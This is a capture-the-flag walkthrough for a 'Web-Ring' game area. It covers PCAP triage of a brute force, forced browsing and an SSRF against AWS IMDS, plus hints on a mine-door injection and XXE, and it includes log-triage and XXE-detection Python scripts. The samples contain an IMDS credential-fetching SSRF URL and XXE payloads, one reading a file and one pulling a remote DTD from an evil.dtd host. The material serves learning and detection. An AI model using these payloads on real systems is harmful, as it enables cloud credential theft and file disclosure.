Area: Web-Ring
Area Layout
Visit 1
Immediately after entering this area, four new objective tasks are unlocked. Head to the right to speak with Alabaster Snowball, unlocking a hint for the Naughty IP task.
Alabaster Snowball
Hey there! I'm Alabaster Snowball
And I have to say, I'm a bit distressed.
I was working with the dwarves and their Boria mines, and I found some disturbing activity!
Looking through [these artifacts](assets/boriaArtifacts.zip), I think something naughty's going on.
Can you please take a look and answer a few questions for me?
First, we need to know where the attacker is coming from.
If you haven't looked at Wireshark's _Statistics_ menu, this might be a good time!
...
There don't appear to be any terminals used to solve these objective tasks. The first objective task is . After retrieving the naughty IP, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 5 coins.
The second objective task is . After retrieving the username, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 5 coins.
The third objective task is . After retrieving the URL path, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 5 coins.
The fourth objective task is . After retrieving the URL, submit it via the Objectives tab in the badge. This will complete the objective task and reward you with 10 coins, and an achievement.
Speak with Alabaster again to unlock some hints for the objective tasks that were just completed, as well as for the 'Open Boria Mine Door' objective task.
Alabaster Snowball
Aha, you found the naughty actor! Next, please look into the account brute force attack.
You can focus on requests to `/login.html`~
Alice? I totally expected Eve! Well how about forced browsing? What's the first URL path they found that way?
The misses will have HTTP status code `404` and, in this case, the successful guesses return `200`.
Great! Just one more challenge! It looks like they made the server pull credentials from IMDS. What URL was forced?
AWS uses a specific IP address for IMDS lookups. Searching for that in the PCAP should get you there quickly.
Fantastic! It seems simpler now that I've seen it once. Thanks for showing me!
Hey, so maybe I can help you out a bit with the door to the mines.
First, it'd be great to bring an Elvish keyboard, but if you can't find one, I'm sure other input will do.
Instead, take a minute to read the HTML/JavaScript source and consider how the locks are processed.
Next, take a look at the `Content-Security-Policy` header. That drives how certain content is handled.
Lastly, remember that input sanitization might happen on either the client or server ends!
...
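The four questions Alabaster asks (noisiest source address, brute-forced login username, first forced-browsing hit, and the URL forced through IMDS) are all answered by the same kind of triage over the HTTP requests in the capture. The script below is an added example, not part of this walkthrough or of the challenge artifacts: it works over a constructed request summary (source IP, method, path, status, POST body), the sort of table you can export from Wireshark's HTTP statistics, and the function names and sample values are assumptions made for the demonstration. The IMDS address `169.254.169.254` is the real AWS link-local metadata address.

```python
"""Triage a constructed HTTP request summary for the four Web-Ring questions:
noisiest source IP, brute-forced username, first forced-browsing hit, and the
URL the server was made to fetch from the AWS instance metadata service."""
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlparse

# AWS IMDS listens on this link-local address; any client-supplied URL that
# points here is a sign the server is being used as a proxy (SSRF).
IMDS_ADDRESS = "169.254.169.254"

# Constructed sample, in capture order: (src_ip, method, path, status, post_body).
# These are not rows from the real PCAP.
REQUESTS = [
    ("10.0.0.5", "GET", "/index.html", 200, ""),
    ("10.0.0.5", "GET", "/static/app.js", 200, ""),
    ("203.0.113.7", "POST", "/login.html", 401, "username=alice&password=123456"),
    ("203.0.113.7", "POST", "/login.html", 401, "username=alice&password=password"),
    ("203.0.113.7", "POST", "/login.html", 401, "username=alice&password=letmein"),
    ("10.0.0.9", "POST", "/login.html", 200, "username=bob&password=correct-horse"),
    ("203.0.113.7", "POST", "/login.html", 200, "username=alice&password=winter2022"),
    ("203.0.113.7", "GET", "/admin", 404, ""),
    ("203.0.113.7", "GET", "/backup", 404, ""),
    ("203.0.113.7", "GET", "/secret-notes", 200, ""),
    ("203.0.113.7", "GET", "/config", 404, ""),
    ("203.0.113.7", "GET", "/proxy?url=http://" + IMDS_ADDRESS
     + "/latest/meta-data/iam/security-credentials/", 200, ""),
    ("10.0.0.5", "GET", "/about.html", 200, ""),
]


def noisiest_source(requests):
    """Source IP with the most requests (what Statistics > Endpoints shows in Wireshark)."""
    ip, _ = Counter(r[0] for r in requests).most_common(1)[0]
    return ip


def login_attempts(requests, login_path="/login.html"):
    """Per source IP: number of POSTs to the login page and the usernames tried."""
    per_ip = defaultdict(lambda: {"attempts": 0, "usernames": Counter()})
    for ip, method, path, _status, body in requests:
        if method == "POST" and urlparse(path).path == login_path:
            per_ip[ip]["attempts"] += 1
            user = parse_qs(body).get("username", ["<none>"])[0]
            per_ip[ip]["usernames"][user] += 1
    return per_ip


def brute_forced_username(requests, threshold=3):
    """(ip, username) for the source with the most login attempts at or above
    the threshold; None when nobody crosses it."""
    candidates = {ip: e for ip, e in login_attempts(requests).items()
                  if e["attempts"] >= threshold}
    if not candidates:
        return None
    ip = max(candidates, key=lambda k: candidates[k]["attempts"])
    user, _ = candidates[ip]["usernames"].most_common(1)[0]
    return ip, user


def first_forced_browsing_hit(requests, min_misses=2):
    """First path answered 200 to a source that has already piled up
    min_misses 404s: guesses miss with 404, a real hit comes back 200."""
    misses = Counter()
    for ip, _method, path, status, _body in requests:
        if status == 404:
            misses[ip] += 1
        elif status == 200 and misses[ip] >= min_misses:
            return ip, urlparse(path).path
    return None


def imds_requests(requests):
    """Requests whose URL or body names the IMDS address."""
    return [(ip, path) for ip, _m, path, _s, body in requests
            if IMDS_ADDRESS in path or IMDS_ADDRESS in body]


def forced_imds_url(requests):
    """The metadata URL the attacker handed the server, pulled from the query string."""
    for _ip, path in imds_requests(requests):
        for values in parse_qs(urlparse(path).query).values():
            for value in values:
                if IMDS_ADDRESS in value:
                    return value
    return None


if __name__ == "__main__":
    print("noisiest source:", noisiest_source(REQUESTS))
    print("brute force:", brute_forced_username(REQUESTS))
    print("forced browsing hit:", first_forced_browsing_hit(REQUESTS))
    print("forced IMDS URL:", forced_imds_url(REQUESTS))
```

The status-code logic mirrors Alabaster's hint: forced-browsing misses are 404s, so the first 200 after a run of 404s from the same source is the first directory the guesser actually found. On the real capture the same approach applies after exporting the HTTP requests (with POST bodies) from Wireshark into this shape.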
Continue moving to the right, then speak with Hal Tandybuck. This conversation will unlock the 'Open Boria Mine Door' task. Interact with the Cranberry Pi terminal to begin the objective task. Successfully unlocking Pins 1-3 will unlock an achievement, complete the Boria Mine Door objective task, and unlock the follow-up task telling you to speak with Hal Tandybuck for the next full task. It will also open the door just to the right of this terminal. Completing all six pins will grant 50 coins and a bonus achievement.
Speak with Hal Tandybuck again before going through the newly unlocked door. You will receive some hints about the upcoming challenge, some additional ones if you've solved all 6 pins, and you will unlock the next objective task 'Glamtariel's Fountain'.
Hal Tandybuck
Great! Thanks so much for your help!
When you get to the fountain inside, there are some things you should consider.
First, it might be helpful to focus on Glamtariel's CAPITALIZED words.
If you finish those locks, I might just have another hint for you!
Wha - what?? You opened all the locks?! Well then...
Did you see the nearby terminal with evidence of an XXE attack?
Maybe take a close look at that kind of thing.
...
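Hal's last hint points at a terminal holding evidence of an XXE attack. What that evidence looks like in request logs is a DOCTYPE that declares an external (SYSTEM or PUBLIC) entity or a parameter entity, and then references it in the body. The detector below is an added example, not code from the walkthrough or the challenge terminal; the sample bodies are constructed (the file path is a placeholder) and the function names are assumptions.

```python
"""Flag XML request bodies that carry the usual signs of an XXE attempt."""
import re

# Constructed sample request bodies; not taken from the challenge terminal.
SAMPLE_BODIES = {
    "benign": "<?xml version='1.0'?><ring><elf>Hal</elf></ring>",
    "file-read": ("<?xml version='1.0'?>"
                  "<!DOCTYPE ring [<!ENTITY ext SYSTEM 'file:///PLACEHOLDER/PATH'>]>"
                  "<ring><elf>&ext;</elf></ring>"),
    "parameter-entity": ("<!DOCTYPE ring [<!ENTITY % dtd SYSTEM "
                         "'http://example.invalid/evil.dtd'>%dtd;]><ring/>"),
    "internal-only": "<!DOCTYPE ring [<!ENTITY greeting 'hello'>]><ring>&greeting;</ring>",
}

DOCTYPE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# <!ENTITY name SYSTEM ...> or <!ENTITY % name PUBLIC ...>: entity content comes from outside.
EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# <!ENTITY % name ...>: parameter entity, used to pull in a remote DTD.
PARAMETER_ENTITY = re.compile(r"<!ENTITY\s+%\s+\w+", re.IGNORECASE)
# &name; that is not one of the five predefined entities or a character reference.
ENTITY_REFERENCE = re.compile(r"&(?!(?:amp|lt|gt|quot|apos|#\d+|#x[0-9a-f]+);)\w+;",
                              re.IGNORECASE)


def xxe_indicators(body):
    """Names of the indicators found in one body; empty list means nothing suspicious."""
    found = []
    if DOCTYPE.search(body):
        found.append("doctype")
    if EXTERNAL_ENTITY.search(body):
        found.append("external-entity")
    if PARAMETER_ENTITY.search(body):
        found.append("parameter-entity")
    if DOCTYPE.search(body) and ENTITY_REFERENCE.search(body):
        found.append("custom-entity-reference")
    return found


def is_xxe_attempt(body):
    """External or parameter entities count as an attempt; an internal-only
    entity is just an unusual DOCTYPE and is reported but not flagged."""
    indicators = xxe_indicators(body)
    return "external-entity" in indicators or "parameter-entity" in indicators


def triage(bodies):
    """Map each named body to whether it looks like an XXE attempt."""
    return {name: is_xxe_attempt(body) for name, body in bodies.items()}


if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, xxe_indicators(body), "ATTEMPT" if is_xxe_attempt(body) else "ok")
```

On a server that does not need DTDs at all, the simplest mitigation is to reject any body containing a DOCTYPE and to configure the XML parser with external entity resolution disabled; the detector above is the log-side check for requests that got through before that was in place.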
Go through the Boria Door to enter the Fountain Area.
Visit 2
None of the NPCs here have new dialog. Head to the left and through the door, back into the .